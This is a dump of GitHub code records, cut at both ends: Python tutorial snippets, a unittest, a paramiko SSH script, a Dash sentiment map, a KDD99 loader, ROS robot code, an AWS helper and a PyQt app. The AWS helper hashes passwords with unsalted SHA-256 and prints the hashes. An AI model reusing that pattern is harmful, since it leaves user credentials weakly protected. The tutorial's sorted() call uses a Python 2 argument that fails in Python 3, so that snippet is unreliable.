step, angle=0):\n nx = x + step * math.cos(angle)\n ny = y - step * math.sin(angle)\n return nx, ny\n\n#据说是默认参数最大一个坑\ndef add_end(L=[]):\n L.append(\"end\")\n return L\nprint(add_end())\nprint(add_end())\n\n#可变参数\ndef calc(*numbers):\n count = 0\n for n in numbers:\n count = count + n\n return count\nprint(calc(1, 2, 5))\nprint(calc())\n\ntheNums =[1 ,2 ,3 ,4 ,5]\nprint(calc(*theNums))\n\n#默认参数,关键字参数,可以混用\ndef fun(name ,age=18 ,score =80):\n print (\"name :%s , age :%d , score :%d\" % (name ,age ,score))\n\nfun('guo')\nfun('guo' ,20)\nfun('guo' ,score=100)\nfun(age=16 ,name='liao')\n\n#函数变量\nprint(\"函数变量\")\n\nfun1 = abs\nprint(fun1(-1))\n\ndef addFun(x ,y ,fun):\n return fun(x) +fun(y)\nprint(addFun(3 ,-5 ,abs))\n\ndef squr(x):\n return x *x\nprint(list(map(squr ,list(range(10)))))\n\nprint([x * x for x in [1, 2, 3, 4, 5, 6, 7, 8, 9]])\n\ndef add(x ,y):\n return x +y\nprint(reduce(add ,list(range(10))))\n\ndef str2int(s):\n def fn(x, y):\n return x * 10 + y\n def char2num(s):\n return {'0': 0, '1': 1, '2': 2, '3': 3, '4': 4, '5': 5, '6': 6, '7': 7, '8': 8, '9': 9}[s]\n return reduce(fn, list(map(char2num, s)))\nprint(str2int(\"12355\"))\n\n#filter的处理函数返回bool值\ndef is_odd(n):\n return n % 2 == 1\nprint(list(filter(is_odd, [1, 2, 4, 5, 6, 9, 10, 15])))\n\n\nprint(sorted(['bob', 'about', 'Zoo', 'Credit']))\ndef cmp_ignore_case(s1, s2):\n u1 = s1.upper()\n u2 = s2.upper()\n if u1 < u2:\n return -1\n if u1 > u2:\n return 1\n return 0\nprint(sorted(['bob', 'about', 'Zoo', 'Credit'], cmp_ignore_case))\n\n\n\n\n\n\n", "repo_name": "artofree/study", "sub_path": "pythons/function.py", "file_name": "function.py", "file_ext": "py", "file_size_in_byte": 1898, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "math.cos", "line_number": 13, "usage_type": "call"}, {"api_name": "math.sin", "line_number": 14, "usage_type": "call"}, {"api_name": "functools.reduce", "line_number": 63, "usage_type": "call"}, {"api_name": "functools.reduce", "line_number": 70, "usage_type": "call"}]} +{"seq_id": "45175277314", "text": "import logging\nimport time\nimport unittest\n\nfrom jacalingest.engine.servicerunner import ServiceRunner\nfrom jacalingest.engine.configuration.configurationadapter import ConfigurationAdapter\nfrom jacalingest.engine.configuration.configurationmessage import ConfigurationMessage\n\nfrom jacalingest.engine.messaging.queuemessagingsystem import QueueMessagingSystem\nfrom jacalingest.engine.messaging.messager import Messager\nfrom jacalingest.engine.monitoringandcontrol.metrics import Metrics\nfrom jacalingest.engine.monitoringandcontrol.monitoradapter import MonitorAdapter\nfrom jacalingest.stringdomain.stringconcatenatorservice import StringConcatenatorService\nfrom jacalingest.stringdomain.stringmessage import StringMessage\n\nclass TestStringConcatenatorService(unittest.TestCase):\n\n @classmethod\n def setUpClass(self):\n logging.basicConfig(level=logging.INFO, format='%(threadName)s, %(module)s: %(message)s')\n\n def test(self):\n messaging_system=QueueMessagingSystem()\n messager = Messager()\n metrics_endpoint = messager.get_endpoint(messaging_system, \"metrics\", Metrics)\n first_endpoint = messager.get_endpoint(messaging_system, \"first\", StringMessage)\n second_endpoint = messager.get_endpoint(messaging_system, \"second\", StringMessage)\n concatenation_endpoint = messager.get_endpoint(messaging_system, \"concatenation\", StringMessage)\n control_endpoint = messager.get_endpoint(messaging_system, \"control\", StringMessage)\n\n parameters={\"name\":\"string_concatenator_service\", \"first_endpoint\":first_endpoint, \"second_endpoint\":second_endpoint, \"concatenation_endpoint\":concatenation_endpoint, \"control_endpoint\":control_endpoint}\n \n configuration_endpoint = messager.get_endpoint(messaging_system, \"configuration\", ConfigurationMessage)\n configuration_adapter = ConfigurationAdapter(StringConcatenatorService, parameters, configuration_endpoint)\n monitor_adapter = MonitorAdapter(configuration_adapter, metrics_endpoint)\n service_runner = ServiceRunner(monitor_adapter, messager)\n\n service_runner.start()\n time.sleep(5)\n\n logging.info(\"Publishing ConfigurationMessage\")\n configuration_message = ConfigurationMessage({})\n messager.publish(configuration_endpoint, configuration_message)\n\n time.sleep(5)\n\n logging.info(\"Publishing 'Start' control message\")\n messager.publish(control_endpoint, StringMessage(\"Start\"))\n\n time.sleep(5)\n\n logging.info(\"Publishing 'Stop' control message\")\n messager.publish(control_endpoint, StringMessage(\"Stop\"))\n\n time.sleep(5)\n\n service_runner.terminate()\n service_runner.wait()\n\nif __name__ == '__main__':\n unittest.main()\n\n", "repo_name": "ICRAR/jacal", "sub_path": "ingest/test/test_stringconcatenatorservice.py", "file_name": "test_stringconcatenatorservice.py", "file_ext": "py", "file_size_in_byte": 2761, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "41", "api": [{"api_name": "unittest.TestCase", "line_number": 16, "usage_type": "attribute"}, {"api_name": "logging.basicConfig", "line_number": 20, "usage_type": "call"}, {"api_name": "logging.INFO", "line_number": 20, "usage_type": "attribute"}, {"api_name": "jacalingest.engine.messaging.queuemessagingsystem.QueueMessagingSystem", "line_number": 23, "usage_type": "call"}, {"api_name": "jacalingest.engine.messaging.messager.Messager", "line_number": 24, "usage_type": "call"}, {"api_name": "jacalingest.engine.monitoringandcontrol.metrics.Metrics", "line_number": 25, "usage_type": "argument"}, {"api_name": "jacalingest.stringdomain.stringmessage.StringMessage", "line_number": 26, "usage_type": "argument"}, {"api_name": "jacalingest.stringdomain.stringmessage.StringMessage", "line_number": 27, "usage_type": "argument"}, {"api_name": "jacalingest.stringdomain.stringmessage.StringMessage", "line_number": 28, "usage_type": "argument"}, {"api_name": "jacalingest.stringdomain.stringmessage.StringMessage", "line_number": 29, "usage_type": "argument"}, {"api_name": "jacalingest.engine.configuration.configurationmessage.ConfigurationMessage", "line_number": 33, "usage_type": "argument"}, {"api_name": "jacalingest.engine.configuration.configurationadapter.ConfigurationAdapter", "line_number": 34, "usage_type": "call"}, {"api_name": "jacalingest.stringdomain.stringconcatenatorservice.StringConcatenatorService", "line_number": 34, "usage_type": "argument"}, {"api_name": "jacalingest.engine.monitoringandcontrol.monitoradapter.MonitorAdapter", "line_number": 35, "usage_type": "call"}, {"api_name": "jacalingest.engine.servicerunner.ServiceRunner", "line_number": 36, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 39, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 41, "usage_type": "call"}, {"api_name": "jacalingest.engine.configuration.configurationmessage.ConfigurationMessage", "line_number": 42, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 45, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 47, "usage_type": "call"}, {"api_name": "jacalingest.stringdomain.stringmessage.StringMessage", "line_number": 48, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 50, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 52, "usage_type": "call"}, {"api_name": "jacalingest.stringdomain.stringmessage.StringMessage", "line_number": 53, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 55, "usage_type": "call"}, {"api_name": "unittest.main", "line_number": 61, "usage_type": "call"}]} +{"seq_id": "43385596106", "text": "#paramiko connect server use id_rsa\n#2019/08/21\n\nimport paramiko\n\nprivate = paramiko.RSAKey.from_private_key_file(r'C:\\Users\\陈文斌\\.ssh\\id_rsa')\n\nclient = paramiko.SSHClient()\nclient.set_missing_host_key_policy(paramiko.AutoAddPolicy())\nclient.connect(\n hostname='192.168.40.141',\n port=22,\n username='root',\n pkey=private\n)\n\nstdin,stdout,stderr = client.exec_command(command='sl',timeout=1)\nprint(stderr.read().decode('utf-8'))\n\nclient.close()\n\n", "repo_name": "SwordsDevil/gpcloud", "sub_path": "Day13/02.paramiko_rsa.py", "file_name": "02.paramiko_rsa.py", "file_ext": "py", "file_size_in_byte": 462, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "41", "api": [{"api_name": "paramiko.RSAKey.from_private_key_file", "line_number": 6, "usage_type": "call"}, {"api_name": "paramiko.RSAKey", "line_number": 6, "usage_type": "attribute"}, {"api_name": "paramiko.SSHClient", "line_number": 8, "usage_type": "call"}, {"api_name": "paramiko.AutoAddPolicy", "line_number": 9, "usage_type": "call"}]} +{"seq_id": "27832545947", "text": "\"\"\"\nYour task is to create a function that given a sequence and a predicate,\nreturns True if only some (but not all) elements in the sequence are True\nafter applying the predicate\n\"\"\"\nfrom typing import Callable\n\n\ndef some_basic(string: str, function: Callable) -> bool:\n \"\"\"Check if some elements in a string match the function (basic).\n\n Args:\n string: string to verify.\n function: function to call.\n\n Returns:\n True if some of elements are in the sequence are True.\n\n Examples:\n >>> assert some_basic('abcdefg&%$', str.isalpha)\n >>> assert not some_basic('&%$=', str.isalpha)\n \"\"\"\n match: int = 0\n for next_string in string: # type: str\n if function(next_string):\n match += 1\n return len(string) > match > 0\n\n\ndef some_func(string: str, function: Callable) -> bool:\n \"\"\"Check if some elements in a string match the function (functional).\n\n Args:\n string: string to verify.\n function: function to call.\n\n Returns:\n True if some of elements are in the sequence are True.\n\n Examples:\n >>> assert some_func('abcdefg&%$', str.isalpha)\n >>> assert not some_func('&%$=', str.isalpha)\n \"\"\"\n return any(map(function, string)) and not all(map(function, string))\n\n\nif __name__ == '__main__':\n print(some_basic('abcdefg', str.isalpha))\n print(some_func('abcdefg', str.isalpha))\n", "repo_name": "vyahello/upgrade-python-kata", "sub_path": "kata/07/some.py", "file_name": "some.py", "file_ext": "py", "file_size_in_byte": 1440, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "41", "api": [{"api_name": "typing.Callable", "line_number": 9, "usage_type": "name"}, {"api_name": "typing.Callable", "line_number": 30, "usage_type": "name"}]} +{"seq_id": "11107562318", "text": "import os\nimport dash\nimport dash_html_components as html\nimport dash_core_components as dcc\n# from dash.dependencies import Output, Event, Input\nfrom WatchDogs_MongoWrapper import MongoWrapper\nimport requests\nimport json\nimport pandas as pd\nfrom pandas.io.json import json_normalize\n# from geopy.geocoders import Nominatim\n\napp = dash.Dash(__name__)\n\nserver = app.server\n\napp.layout = html.Div(style={'background':'#2f3239'}, children=[\n dcc.Dropdown(\n style={\n 'backgroundColor':'#f8f8f8', 'borderColor':'#2f3239', 'borderRadius':'5px', 'fontFamily':'Roboto', 'height':'35px', 'width':'150px'\n },\n value='Microsoft',\n id='my_dropdown',\n placeholder='Select a stock',\n options=[\n {'label': 'Microsoft', 'value': 'Microsoft'},\n {'label': 'Facebook', 'value': 'Facebook'}, \n {'label': 'Visa', 'value': 'Visa'},\n {'label': 'Nvidia', 'value': 'Nvidia'},\n {'label': 'Google', 'value': 'Google'},\n {'label': 'Nike', 'value': 'Nike'},\n {'label': 'Alibaba', 'value': 'Alibaba'},\n {'label': 'Netflix', 'value': 'Netflix'},\n {'label': 'PayPal', 'value': 'PayPal'},\n {'label': 'Ebay', 'value': 'Ebay'},\n {'label': 'Tesla', 'value': 'Tesla'},\n {'label': 'Twitter', 'value': 'Twitter'},\n {'label': 'Disney', 'value': 'Disney'},\n {'label': 'Pepsi', 'value': 'Pepsi'},\n {'label': 'Lyft', 'value': 'Lyft'},\n {'label': 'Chevron', 'value': 'Chevron'},\n {'label': 'Cisco', 'value': 'Cisco'},\n {'label': 'Intel', 'value': 'Intel'},\n {'label': 'Verizon', 'value': 'Verizon'},\n {'label': 'AT&T', 'value': 'AT&T'},\n {'label': 'Nokia', 'value': 'Nokia'},\n {'label': 'Comcast', 'value': 'Comcast'},\n {'label': 'Kroger', 'value': 'Kroger'},\n {'label': 'Boeing', 'value': 'Boeing'},\n {'label': 'Starbucks', 'value': 'Starbucks'},\n {'label': 'Walmart', 'value': 'Walmart'},\n {'label': 'Adobe', 'value': 'Adobe'},\n {'label': 'Dell', 'value': 'Dell'},\n {'label': 'Ford', 'value': 'Ford'},\n {'label': 'Samsung', 'value': 'Samsung'},\n ]\n ),\n \n html.Div(id='output-container', style={'backgroundColor':'transparent'}),\n\n])\n\n@app.callback(\n dash.dependencies.Output('output-container', 'children'),\n [dash.dependencies.Input('my_dropdown', 'value')]\n )\n\n\ndef update_graph_live(value):\n\n # response = requests.get(\"http://104.154.230.56/api/get_tweets_with_lat_long/{}\".format(value))\n # data = response.json()\n # pretty = pd.DataFrame()\n\n # df_sent = pd.DataFrame.from_dict(json_normalize(data['Sentiment_Value']), orient='columns')\n # df_lat = pd.DataFrame.from_dict(json_normalize(data['Latitude']), orient='columns')\n # df_long = pd.DataFrame.from_dict(json_normalize(data['Longitude']), orient='columns')\n # df_tweet = pd.DataFrame.from_dict(json_normalize(data['Tweet_Text']), orient='columns')\n\n # sent_list = df_sent.iloc[0].tolist()\n # lat_list = df_lat.iloc[0].tolist()\n # long_list = df_long.iloc[0].tolist()\n # tweet_list = df_tweet.iloc[0].tolist()\n\n # pretty['Sentiment'] = sent_list\n # pretty['Latitude'] = lat_list\n # pretty['Longitude'] = long_list\n # pretty['Tweet'] = tweet_list\n \n response_latlong = requests.get(\"http://104.154.230.56/api/get_tweets_with_lat_long/{}\".format(value))\n data = response_latlong.json()\n pretty = json_normalize(data)\n\n totalSentiment = pretty['Sentiment_Value']\n totalLongitude = pretty['Longitude']\n totalLatitude = pretty['Latitude']\n totalTweet = pretty['Tweet_Text']\n\n tots2 = totalSentiment.count()\n\n scl = [ [0,\"rgb(39,174,96)\"],[0.35,\"rgb(46,204,113)\"],[0.5,\"rgb(241,196,15)\"],\\\n [0.6,\"rgb(243,156,18)\"],[0.7,\"rgb(231,76,60)\"],[1,\"rgb(192,57,43)\"] ]\n\n return dcc.Graph(\n style={'height': '900px'},\n figure={\n 'data' :[{\n 'type':'scattergeo',\n # 'locationmode':'USA-states',\n 'lon' : totalLongitude,\n 'lat' : totalLatitude,\n 'text' : totalTweet,\n 'mode':'markers',\n 'marker':{ \n 'size':10, \n # 'opacity':1,\n 'reversescale':True,\n 'autocolorscale':False,\n 'symbol':'circle-open',\n 'line':{\n 'width':1.5,\n 'color':'rgba(150, 150, 150)'\n },\n 'colorscale' : scl,\n 'cmin' : -1,\n 'color' : totalSentiment,\n 'cmax' : 1,\n 'colorbar':{\n 'title':{\n 'text':\"Polarity Scale\",\n 'font':{\n 'size':14,\n },\n },\n 'thickness':20,\n 'titleside' : \"right\",\n 'ticks' : \"outside\",\n 'ticklen' : 3,\n 'tickfont':{\n 'size':10,\n },\n # 'showticksuffix' : \"last\",\n # 'ticksuffix' : \" inches\",\n 'dtick' : 0.1\n }\n }\n }],\n\n 'layout' :{\n # 'legend':{\n # 'orientation': 'h',\n # },\n 'paper_bgcolor':'#2f3239',\n 'plot_bgcolor':'#2f3239',\n 'title': \"Twitter Sentiment for {}\\n\".format(value), \n 'font':{\n 'size':15,\n 'color': '#f8f8f8',\n },\n 'geo' :{\n # 'scope':'usa',\n # 'projection':dict( 'type'='albers usa' ),\n 'showland' : True,\n 'bgcolor': '#2f3239', \n 'landcolor' : \"#2f3239\",\n 'subunitcolor' : \"#2f3239\",\n 'countrycolor' : \"#f8f8f8\",\n 'coastlinewidth': 0.5,\n 'countrywidth' : 0.5,\n 'subunitwidth' : 1,\n 'showsubunits': True,\n 'showcountries':True,\n 'showcoastlines':True,\n 'coastlinecolor':\"#f8f8f8\",\n 'showframe':False,\n # 'framecolor': \"rgb(155, 155, 155)\"\n 'showocean':True,\n 'oceancolor':\"#2f3239\"\n # 'showlakes':True \n },\n } \n }\n ), \n # html.Div(children='Total Tweets pulled for searchword: {}.\\n'.format(tots2))\n \nif __name__ == '__main__':\n app.run_server(debug=True)\n", "repo_name": "prashanth-thipparthi/WatchDogs_StockMarketAnalysis", "sub_path": "WatchDogs_Visualisation/newApps/MapNew.py", "file_name": "MapNew.py", "file_ext": "py", "file_size_in_byte": 7143, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "41", "api": [{"api_name": "dash.Dash", "line_number": 13, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 17, "usage_type": "call"}, {"api_name": "dash_core_components.Dropdown", "line_number": 18, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 59, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 90, "usage_type": "call"}, {"api_name": "pandas.io.json.json_normalize", "line_number": 92, "usage_type": "call"}, {"api_name": "dash_core_components.Graph", "line_number": 104, "usage_type": "call"}, {"api_name": "dash.dependencies.Output", "line_number": 64, "usage_type": "call"}, {"api_name": "dash.dependencies", "line_number": 64, "usage_type": "attribute"}, {"api_name": "dash.dependencies.Input", "line_number": 65, "usage_type": "call"}, {"api_name": "dash.dependencies", "line_number": 65, "usage_type": "attribute"}]} +{"seq_id": "69923343805", "text": "import torch\nimport os\nimport random\nfrom torch.utils.data import Dataset\nfrom torch.utils.data import DataLoader\nfrom torchvision import transforms\nfrom torchvision.datasets import ImageFolder\nfrom PIL import Image\nimport h5py\nimport numpy as np\nimport collections\nimport numbers\nimport math\nimport pandas as pd\nclass KDD99Loader(object):\n def __init__(self, data_path, mode=\"train\"):\n self.mode=mode\n data = np.load(data_path)\n\n labels = data[\"kdd\"][:,-1]\n features = data[\"kdd\"][:,:-1]\n N, D = features.shape\n \n normal_data = features[labels==1]\n normal_labels = labels[labels==1]\n\n N_normal = normal_data.shape[0]\n\n attack_data = features[labels==0]\n attack_labels = labels[labels==0]\n\n N_attack = attack_data.shape[0]\n\n randIdx = np.arange(N_attack)\n np.random.shuffle(randIdx)\n N_train = N_attack // 2\n\n self.train = attack_data[randIdx[:N_train]]\n self.train_labels = attack_labels[randIdx[:N_train]]\n\n self.test = attack_data[randIdx[N_train:]]\n self.test_labels = attack_labels[randIdx[N_train:]]\n\n self.test = np.concatenate((self.test, normal_data),axis=0)\n self.test_labels = np.concatenate((self.test_labels, normal_labels),axis=0)\n\n\n def __len__(self):\n \"\"\"\n Number of images in the object dataset.\n \"\"\"\n if self.mode == \"train\":\n return self.train.shape[0]\n else:\n return self.test.shape[0]\n\n\n def __getitem__(self, index):\n if self.mode == \"train\":\n return np.float32(self.train[index]), np.float32(self.train_labels[index])\n else:\n return np.float32(self.test[index]), np.float32(self.test_labels[index])\n \n\ndef get_loader(data_path, batch_size, mode='train'):\n \"\"\"Build and return data loader.\"\"\"\n\n dataset = KDD99Loader(data_path, mode)\n\n shuffle = False\n if mode == 'train':\n shuffle = True\n\n data_loader = DataLoader(dataset=dataset,\n batch_size=batch_size,\n shuffle=shuffle)\n return data_loader\n", "repo_name": "danieltan07/dagmm", "sub_path": "data_loader.py", "file_name": "data_loader.py", "file_ext": "py", "file_size_in_byte": 2153, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 370, "dataset": "github-code", "pt": "41", "api": [{"api_name": "numpy.load", "line_number": 18, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 34, "usage_type": "call"}, {"api_name": "numpy.random.shuffle", "line_number": 35, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 35, "usage_type": "attribute"}, {"api_name": "numpy.concatenate", "line_number": 44, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 45, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 60, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 62, "usage_type": "call"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 74, "usage_type": "call"}]} +{"seq_id": "1184117437", "text": "import rospy\nimport tf\nimport time\nimport numpy as np\nfrom std_msgs.msg import String\n\n\nclass Simple_strategy():\n def __init__(self, stm_pub, res_sub):\n self.stm_pub = stm_pub\n self.rate = rospy.Rate(30)\n self.listener = tf.TransformListener()\n self.id = 0\n self.is_response = False\n rospy.Subscriber(res_sub, String, self.response_callback)\n\n def get_next_id(self):\n self.id += 1\n return self.id\n\n def start_stm_cmd(self, cmd, with_response=True):\n self.get_next_id()\n self.is_response = False\n self.stm_pub.publish(str(self.id) + \" \" + cmd)\n if not with_response:\n while not self.is_response and not rospy.is_shutdown():\n self.rate.sleep()\n\n def take_angle(self):\n (trans, rot) = self.listener.lookupTransform('map', 'secondary_robot', rospy.Time(0))\n yaw = tf.transformations.euler_from_quaternion(rot)[2]\n return yaw\n\n def take_coord(self):\n (trans, rot) = self.listener.lookupTransform('map', 'secondary_robot', rospy.Time(0))\n return np.array(trans[:2])\n\n def move_on_angle(self, target_angle):\n self_angle = self.take_angle()\n da = (target_angle - self_angle) % (2 * np.pi)\n if da > np.pi:\n da = np.pi - da\n else:\n da = da\n self.start_stm_cmd(\"0 0 \" + str(da) + \" 0 0 1\")\n\n def response_callback(self, data):\n data_splitted = data.data.split()\n if data_splitted[0] == str(self.id) and data_splitted[1] == \"finished\":\n self.is_response = True\n\n def move_on_point(self, target_point):\n self_point = self.take_coord()\n angle = self.take_angle()\n dl = target_point - self_point\n dl[0], dl[1] = dl[0] * np.cos(angle) + dl[1] * np.sin(angle), -dl[0] * np.sin(angle) + dl[1] * np.cos(angle)\n dt = np.max(dl / np.array([0.2, 0.2]))\n v = np.abs(dl / dt)\n self.start_stm_cmd(str(dl[0]) + \" \" + str(dl[1]) + \" 0 \" + str(v[0]) + \" \" + str(v[1]) + \" 0\")\n\n def start(self):\n self.move_on_angle(4.71)\n self.move_on_point(np.array([0.2, 0.5]))\n self.start_stm_cmd(\"8 -0.1 0 0\")\n time.sleep(4)\n self.start_stm_cmd(\"8 0 0 0\")\n\n", "repo_name": "SkoltechRobotics/ros-eurobot-2018", "sub_path": "eurobot_decision_maker/scripts/simple_secondary.py", "file_name": "simple_secondary.py", "file_ext": "py", "file_size_in_byte": 2254, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "41", "api": [{"api_name": "rospy.Rate", "line_number": 11, "usage_type": "call"}, {"api_name": "tf.TransformListener", "line_number": 12, "usage_type": "call"}, {"api_name": "rospy.Subscriber", "line_number": 15, "usage_type": "call"}, {"api_name": "std_msgs.msg.String", "line_number": 15, "usage_type": "argument"}, {"api_name": "rospy.is_shutdown", "line_number": 26, "usage_type": "call"}, {"api_name": "rospy.Time", "line_number": 30, "usage_type": "call"}, {"api_name": "tf.transformations.euler_from_quaternion", "line_number": 31, "usage_type": "call"}, {"api_name": "tf.transformations", "line_number": 31, "usage_type": "attribute"}, {"api_name": "rospy.Time", "line_number": 35, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 36, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 40, "usage_type": "attribute"}, {"api_name": "numpy.pi", "line_number": 41, "usage_type": "attribute"}, {"api_name": "numpy.pi", "line_number": 42, "usage_type": "attribute"}, {"api_name": "numpy.cos", "line_number": 56, "usage_type": "call"}, {"api_name": "numpy.sin", "line_number": 56, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 57, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 57, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 58, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 63, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 65, "usage_type": "call"}]} +{"seq_id": "21622621774", "text": "from ast import Attribute\nimport base64\nfrom pyclbr import Function\nimport boto3\nfrom botocore.exceptions import ClientError\nimport json\nimport hashlib\n\nclass aws_config():\n AWS_ACCESS_KEY_ID = \"*********************\"\n AWS_SECRET_ACCESS_KEY = \"*******************\"\n REGION_NAME = \"us-east-1\"\n\n\nclass s3_client():\n def __init__(self):\n self.client = boto3.client('s3',\n aws_access_key_id = aws_config.AWS_ACCESS_KEY_ID,\n aws_secret_access_key = aws_config.AWS_SECRET_ACCESS_KEY,\n region_name = aws_config.REGION_NAME)\n self.bucketName = \"ece1779-bucket-a3\"\n\n def upload(self, fname, key):\n self.client.put_object(Body=fname, Bucket=self.bucketName, Key = key)\n print(\"Successfully upload!\")\n\n def fetch_file(self, key):\n try:\n res = self.s3_client.get_object(Bucket = self.bucketName, Key = key)\n print(\"Successfully fetched!\")\n f_content = base64.b64encode(res['Body'].read()).decode()\n return f_content\n except ClientError as e:\n print(\"Error\", e)\n return e\n\nclass dynamodb():\n def __init__(self):\n self.session = boto3.Session(\n aws_access_key_id = aws_config.AWS_ACCESS_KEY_ID,\n aws_secret_access_key = aws_config.AWS_SECRET_ACCESS_KEY,\n region_name = aws_config.REGION_NAME)\n self.dynamodb = self.session.resource('dynamodb')\n self.client = self.session.client('dynamodb')\n\n def create_table(self, tname, primary_key, primary_key_type):\n table = self.dynamodb.create_table(\n TableName=tname,\n KeySchema=[\n {\n 'AttributeName': primary_key,\n 'KeyType': 'HASH' #Partition key\n }\n ],\n AttributeDefinitions=[\n {\n 'AttributeName': primary_key,\n 'AttributeType': primary_key_type\n }, \n ],\n ProvisionedThroughput={\n 'ReadCapacityUnits': 5,\n 'WriteCapacityUnits': 5\n },\n Tags=[\n {\n 'Key': 'TableName',\n 'Value': tname\n }\n ]\n )\n\n table.meta.client.get_waiter('table_exists').wait(TableName=tname)\n print(\"Table created!\")\n return \n \n def get_info(self, table_name, primary_key, key_value):\n table = self.dynamodb.Table(table_name)\n try:\n response = table.get_item(\n Key={\n primary_key: key_value\n }\n )\n except ClientError as e:\n print(e.response['Error']['Message'])\n else:\n item = response['Item']\n print('Successfully retrieved item')\n return item\n return None\n\n def insert_into_table(self, tname, data): # (string, dict) -> None\n table = self.dynamodb.Table(tname)\n print(\"data is: \", data)\n table.put_item(\n Item=data\n )\n print(\"Successfully inserted data into {} table\".format(tname))\n return\n\n def verify_username(self, uname, pw):\n table = self.dynamodb.Table('account_info')\n response = table.get_item(\n Key={\n 'username': uname\n }\n )\n if 'Item' not in response:\n print('Invalid company name')\n return(0,0)\n print(response['Item'])\n #print('Entered password: ', pw)\n response = self.get_info('account_info', 'username', uname)\n db_hpw = response['password']\n hpw = hashlib.sha256(pw.encode()).hexdigest()\n print('Hashed entered password: ', hpw)\n print('Password in DB: ', db_hpw)\n return 1 if db_hpw == hpw else 0\n\n def create_account(self, uname, pw):\n l_table = self.client.list_tables()['TableNames']\n #runs the first time to create an Accounts table\n if 'account_info' not in l_table:\n self.create_table('account_info', 'username', 'S')\n\n hpw = hashlib.sha256(pw.encode()).hexdigest()\n new_account = {'username': uname, 'password': hpw}\n print(\"New Account is: \", new_account)\n self.insert_into_table('account_info', new_account)\n\nclass lambda_client():\n def __init__(self):\n self.client = boto3.client('lambda',\n aws_access_key_id = aws_config.AWS_ACCESS_KEY_ID,\n aws_secret_access_key = aws_config.AWS_SECRET_ACCESS_KEY,\n region_name = aws_config.REGION_NAME)\n\n def invoke(self, fname, data):\n json_data = json.dumps(data, default=str)\n return self.client.invoke(FunctionName = fname, Payload = json_data)\n", "repo_name": "suaad28/Cloud_Computing", "sub_path": "Web Scraping Final Project/Lambda_1/aws.py", "file_name": "aws.py", "file_ext": "py", "file_size_in_byte": 4796, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "boto3.client", "line_number": 17, "usage_type": "call"}, {"api_name": "base64.b64encode", "line_number": 31, "usage_type": "call"}, {"api_name": "botocore.exceptions.ClientError", "line_number": 33, "usage_type": "name"}, {"api_name": "boto3.Session", "line_number": 39, "usage_type": "call"}, {"api_name": "botocore.exceptions.ClientError", "line_number": 85, "usage_type": "name"}, {"api_name": "hashlib.sha256", "line_number": 116, "usage_type": "call"}, {"api_name": "hashlib.sha256", "line_number": 127, "usage_type": "call"}, {"api_name": "boto3.client", "line_number": 134, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 140, "usage_type": "call"}]} +{"seq_id": "2953701746", "text": "from PyQt6.QtWidgets import QApplication, QLabel, QPushButton, QWidget, \\\n QMainWindow, QVBoxLayout, QHBoxLayout, QComboBox, QMessageBox\nfrom PyQt6.QtGui import QFont, QFontDatabase, QIcon\nfrom PyQt6 import QtCore\nfrom PyQt6.QtGui import QCursor\nimport sys\nfrom papering_def import openUrl\nfrom papering_database import PaperData\n\n\nclass Main(QMainWindow):\n def __init__(self):\n super().__init__()\n\n # setting the Vbox layout\n v_layout = QVBoxLayout()\n subject_layout = QVBoxLayout()\n year_layout = QVBoxLayout()\n season_layout = QVBoxLayout()\n paper_layout = QVBoxLayout()\n selection_layout = QHBoxLayout()\n\n self.setWindowTitle(\"PAPERING\")\n self.setFixedWidth(600)\n self.setFixedHeight(450)\n self.setStyleSheet(\"background: #F7F6F3;\")\n\n QFontDatabase.addApplicationFont(\"./fonts/ShareTech-Regular.ttf\")\n QFontDatabase.addApplicationFont(\"./fonts/Audiowide-Regular.ttf\")\n self.font = QFont('Share Tech')\n self.h_font = QFont('Audiowide')\n\n # Display banner\n label = QLabel('Papering')\n label.setFont(self.h_font)\n label.setAlignment(QtCore.Qt.AlignmentFlag.AlignHCenter)\n label.setStyleSheet(\n \"font-size: 110px;\" +\n \"margin-top: 40px;\" +\n \"font-weight: bold;\"\n )\n\n # Display the tagline\n subject = QLabel('subject')\n subject.setFont(self.font)\n subject.setAlignment(QtCore.Qt.AlignmentFlag.AlignBottom)\n subject.setStyleSheet(\n \"font-size: 30px;\" +\n \"color: black;\"\n )\n\n year = QLabel('year')\n year.setFont(self.font)\n year.setAlignment(QtCore.Qt.AlignmentFlag.AlignBottom)\n year.setStyleSheet(\n \"font-size: 30px;\" +\n \"color: black;\"\n )\n\n season = QLabel('season')\n season.setFont(self.font)\n season.setAlignment(QtCore.Qt.AlignmentFlag.AlignBottom)\n season.setStyleSheet(\n \"font-size: 30px;\" +\n \"color: black;\"\n )\n\n paper = QLabel('paper')\n 